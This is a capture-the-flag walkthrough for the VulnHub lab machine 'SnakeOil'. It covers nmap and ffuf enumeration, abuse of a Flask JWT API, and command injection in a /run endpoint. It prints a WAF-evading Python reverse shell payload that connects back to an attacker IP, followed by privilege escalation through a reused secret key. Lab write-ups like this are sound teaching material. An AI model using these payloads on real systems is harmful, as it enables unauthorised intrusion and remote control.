Link: https://www.vulnhub.com/entry/snakeoil-1,738/
Vulnhub
SnakeOil
Description
Recently, Good Tech Inc. has decided to change their application development process. However, their applications look broken and too basic. Is this an application full of snakeoil, or are they insecure too? This goes beyond PEN-200, and some web application development expertise could be helpful.
If you MUST have hints for this machine: SNAKEOIL is (#1): a hint by itself, (#2): full of disallowed methods, (#3): a single file full of problems.
Finding the IP
sudo arp-scan --localnet -I eth0
Enumeration
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 73:a4:8f:94:a2:20:68:50:5a:ae:e1:d3:60:8d:ff:55 (RSA)
| 256 f3:1b:d8:c3:0c:3f:5e:6b:ac:99:52:80:7b:d6:b6:e7 (ECDSA)
|_ 256 ea:61:64:b6:3b:d3:84:01:50:d8:1a:ab:38:29:12:e1 (ED25519)
80/tcp open http nginx 1.14.2
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to SNAKEOIL!
8080/tcp open http nginx 1.14.2
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to Good Tech Inc.'s Snake Oil Project
ffuf the web service on port 8080
ffuf -u http://192.168.1.228:8080/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -c -e .php,.html -mc all -fc 403,404 -fl 45,47,51
API
Endpoints
login [Status: 405, Size: 64, Words: 10, Lines: 2]
users [Status: 200, Size: 140, Words: 5, Lines: 2]
registration [Status: 200, Size: 29, Words: 3, Lines: 2]
test [Status: 200, Size: 17, Words: 2, Lines: 2]
create [Status: 200, Size: 2596, Words: 447, Lines: 61]
secret [Status: 500, Size: 37, Words: 4, Lines: 2]
run [Status: 405, Size: 178, Words: 20, Lines: 5]
Seeing the endpoints above I could see a clear path of a normal user login flow.
registration > login (should have auth now)
use login cookies on further requests
Checking what /users show us
{"users": [{"username": "patrick", "password": "$pbkdf2-sha256$~SNIP~0"}]}
Checking /registration we can make a new account.
{"message": "User admin was created. Please use the login API to log in!", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTYzMTEyNzk0NCwian~SNIP~TfNVVP2U81CSxXUIzv9ESg2W4"}
Login (as admin) (After registration)
/secret 500 (add login details)
Cmd execution
POST /run HTTP/1.1
Host: 192.168.1.228:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 63{"url":"127.0.0.1:22", "secret_key":"****~SNIP~****"}
Error but it works, lets test some more commands. After a few tests, I quickly found RCE on the url parameter.
Reverse shell
We can’t use a normal reverse shell here, so we have to split a few commands up to bypass the WAF in place.
{"url":"192.168.1.96:80`p='pyt';b='hon';$p$b -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.96\",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;ip=\"ba\";a=\"sh\"; pty.spawn(ip+a)'`", "secret_key":"****~SNIP~****"}
python -c 'import pty;pty.spawn("/bin/bash")'
User and Enum
/home/patrick/flask_blog
app.config['SECRET_KEY'] = '****~SNIP~****'
app.config['JWT_COOKIE_SECURE'] = True
app.config['JWT_SECRET_KEY'] = '****~SNIP~****'
app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(minutes=15)
app.config['JWT_REFRESH_TOKEN_EXPIRES'] = timedelta(hours=1)
app.config['JWT_TOKEN_LOCATION'] = ['cookies']
app.config['JWT_COOKIE_CSRF_PROTECT'] = False # development setting!
- User Flag
/home/patrick/local.txt
Root
sudo -lMatching Defaults entries for patrick on SNAKEOIL:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser patrick may run the following commands on SNAKEOIL:
(root) NOPASSWD: /sbin/shutdown
(ALL : ALL) ALL
root password is found from app.config[‘JWT_SECRET_KEY’] = ‘SNIP’
root:SNIP
sudo su root
password